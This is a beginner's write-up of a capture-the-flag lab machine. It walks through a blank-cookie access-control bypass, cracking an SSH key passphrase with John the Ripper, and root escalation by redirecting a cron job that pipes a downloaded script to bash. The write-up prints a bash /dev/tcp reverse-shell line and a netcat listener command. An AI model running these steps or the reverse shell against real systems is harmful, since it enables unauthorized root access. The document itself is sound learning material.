Going into this, I'm still super new. I've got the knowledge of some basic tools but still need to look back at my notes to see how they're run - but let's give this one a shot as it's labeled as "easy".
I've found it's VERY important to write the stuff down and the stuff you get while doing this. The machine and the attack box are both timed and I've had multiple times where it just times out and I have to start over. Having information saved will make getting back quicker.
I didn't do an NMAP like I should have, instead I tested the IP for a website. Looks like there's a front end here for some software.
Next step, let's look at the source code for notes and stuff. Looks like we got some comments in there about "Romans used it". Sounds like they might be talking about some encryption types here.
Okay, well after some clicking around I didn't find much, other than some downloads. Let's try using GoBuster and see if I can find anything that might not be linked to.
Ohhh, what's this an admin folder we haven't found yet! There's also some weird folders that all seem to start with http - perhaps backups? We can't visit them so nothing click and follow for me to view.
Ok, this is where I wasn't sure what to do. I played around with BurpSuite to mess around with that username/password fields looking for injection vulns. I decided to click the hint for the first part. The hint shows that we should be looking at the OWASP Top 10 list: https://owasp.org/Top10/
At this time, here' s the list. I guess we just need to work down the list and see which one works. Broken Access Control felt like it should be what I should be looking at but I wasn't sure where to go with it or how to use it.
Looking around the site a bit more and linking it with the Broken Access Control, there is a javascript file that validates and sends information. I'm not really sure what to do with it but feel like I need to be maybe providing information to this script to bypass something. I'll be honest, I was pretty stuck here - I don't really understand the code enough to know where or what to inject.
Using szymex's writeup for a hint, he suggested to provide a blank session cookie
Cookies.set("SessionToken", "")When you do this it gives you a page for the very bottom else statement. You can provide this by using the "Console" section in the web tools and typing the above statement.
Doing this and then refreshing the page will give you a page that looks like an admin is getting pretty frustrated with "James" so he's provided him his own RSA Private key.
Well... let's set aside szymex for a second and see if we can move ahead with this without too much more help. My guess here is we need to crack this RSA key to get James' password for an SSH login to the server.
A quick google search brought me here: https://null-byte.wonderhowto.com/how-to/crack-ssh-private-key-passwords-with-john-ripper-0302810/ which walks through a full table top walkthrough, skipping down we see we're going to be using SSH2john. If you've followed the John The Ripper article I have then you should have the jumbo version installed, which comes with this.
So I copied all the text to a file named "rsa" and used ssh2john to export that to a hash file
using john, we cracked the password
Okay, so we got a password, I'm assuming "james" is the login ID but I don't know for sure. Still reading that page, we can pass the private key right to the SSH server! Let's try that.
ssh -i rsa james@10.10.89.112We tried out of the box and got an error, luckily that same page tells us what to do to fix this. We change the permissions on the file (I backed mine up before I made the change, just in case).
chmod 400 rsassh -i rsa james@10.10.89.112 We provide that passphrase we cracked and bam! We're in!
now we can list out the files and cat that user.txt to get the first flag
There's also a todo.txt file that mentions the build scripts and them going somewhere but not uploading to the site.
Okay, now for escalation. I always have a problem with this but I have some notes to look at for some suggested options. I always like SUID permissions so we'll look for that.
Nothing turned up for SUID permissions at first glance. Poking through the system I noticed there's a cron job that downloads the buildscript.sh file from the website then pipe's it to bash though.
I wonder if there's a way to modify this file so it runs some of the AlderMagic I'd like to do... going through the file system though, I can't seem to dig up the webserver files. I'm unable to edit the crontab file either...
OK... well we know it goes to a domain with a path for the script it wants, then pipes that to bash. What if we modified that domain to point to a different IP... say MY IP. Then we create a .sh file that launches a NC back to me. In theory, because the job runs as root, it should pop that NC shell as root.
Interestingly, I was not able to create an http server on port 80 using the attack box or the attack kali box so I had to use my local kali box to setup this web server. Before we do, we need to create the folder structure and the file it's trying to download. Because this is running as bash, I was able to find a reverse shell example here: https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/
we're going to create the buildscript.sh file and this will be the contents
bash -i >& /dev/tcp/[localIP]/[localPort] 0>&1now we need to spin up our local http server using python
python3 -m http.server 80 --bind [localIP]Next we need to spin up a listener to listen for the incoming connection this server is going to send us.
nc -lv -p [localPort] -s [localIP]Finally, we need to make a change on the hacked box to update the host file to point to this new server IP instead of the localhost.
Once that's completed, we just need to wait for the cron job to execute and then we should be able to see the web request come in, followed by the fully functional shell.
